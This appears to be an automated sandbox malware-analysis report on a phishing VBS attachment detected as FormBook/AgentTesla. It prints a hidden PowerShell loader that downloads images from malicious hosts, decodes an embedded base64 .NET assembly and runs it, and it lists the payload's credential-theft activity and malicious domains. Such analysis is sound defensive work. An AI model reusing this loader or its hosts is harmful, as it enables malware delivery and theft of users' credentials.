Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtrengdgtrevdgtredkdgtrenwdgtre4dgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredidgtrenqdgtre4dgtredgdgtrendgtredgtre2dgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"	Jump to behavior

Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2364296581.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370969245.0000000001040000.00000002.00000001.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368267619.00000000017A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\SyncHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Exploitation for Client Execution	221 Scripting	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	512 Process Injection	4 Obfuscated Files or Information	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	512 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TNT Invoicing_pdf.vbs	13%	ReversingLabs	Script-WScript.Trojan.AgentTesla
TNT Invoicing_pdf.vbs	10%	Virustotal		Browse

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
www.rhyme.academy	0%	Virustotal	Browse
uploaddeimagens.com.br	7%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://uploaddeimagens.com.br	7%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500	12%	Virustotal		Browse
https://lesferch.github.io/DesktopPic	0%	Virustotal		Browse
https://uploaddeimagens.com.br	7%	Virustotal		Browse
https://fanconom.shop	0%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
www.rhyme.academy	216.40.34.41	true	true	0%, Virustotal, Browse	unknown
paste.ee	104.21.84.67	true	false		high
fanconom.shop	185.61.152.60	true	false		unknown
uploaddeimagens.com.br	172.67.215.45	true	true	7%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/z0DWX	false		high
https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500	true	12%, Virustotal, Browse	unknown
https://fanconom.shop/grace/gf.txt	false		unknown
http://www.rhyme.academy/avr4/?-zd=Xr58V0PHlxJ&0Zut6f=x3E/o0JgLrsAY3mnIEvxKvoKIfHhyrIBWJwB0arEEJoLlbt8V3ExA9cg1sEiGVbm5mLCkgWBOmXsxt02WvVKyLItEbcRwm1+9Ok94pNpJk46kEUPTjVsVLh1d58gSyvREgIt0DM=	true		unknown
https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469	true	4%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://twitter.com/hover	SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.instagram.com/hover_domains	SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/7	wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	false		low
https://contoso.com/Icon	powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
http://uploaddeimagens.com.br	powershell.exe, 00000009.00000002.2182091400.000001D05BA0D000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
https://www.ecosia.org/newtab/	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fanconom.shop	powershell.exe, 00000009.00000002.2182091400.000001D05D83B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fanconom.shop	powershell.exe, 00000009.00000002.2182091400.000001D05D3A6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.hover.com/domains/results	SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	false		high
https://lesferch.github.io/DesktopPic	wscript.exe, 00000000.00000003.2094313834.00000213EEB31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069618451.00000213EEAFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069657201.00000213ED057000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094492166.00000213ED02F000.00000004.00000020.00020000.00000000.sdmp, TNT Invoicing_pdf.vbs	false	0%, Virustotal, Browse	unknown
https://paste.ee/#	wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uploaddeimagens.com.br	powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/	wscript.exe, 00000000.00000002.2097892682.00000213ED002000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	false		low
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.2640957810.0000021D3D66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2640957810.0000021D3D6BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055511000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	false		low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2640957810.0000021D3D6E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055511000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false
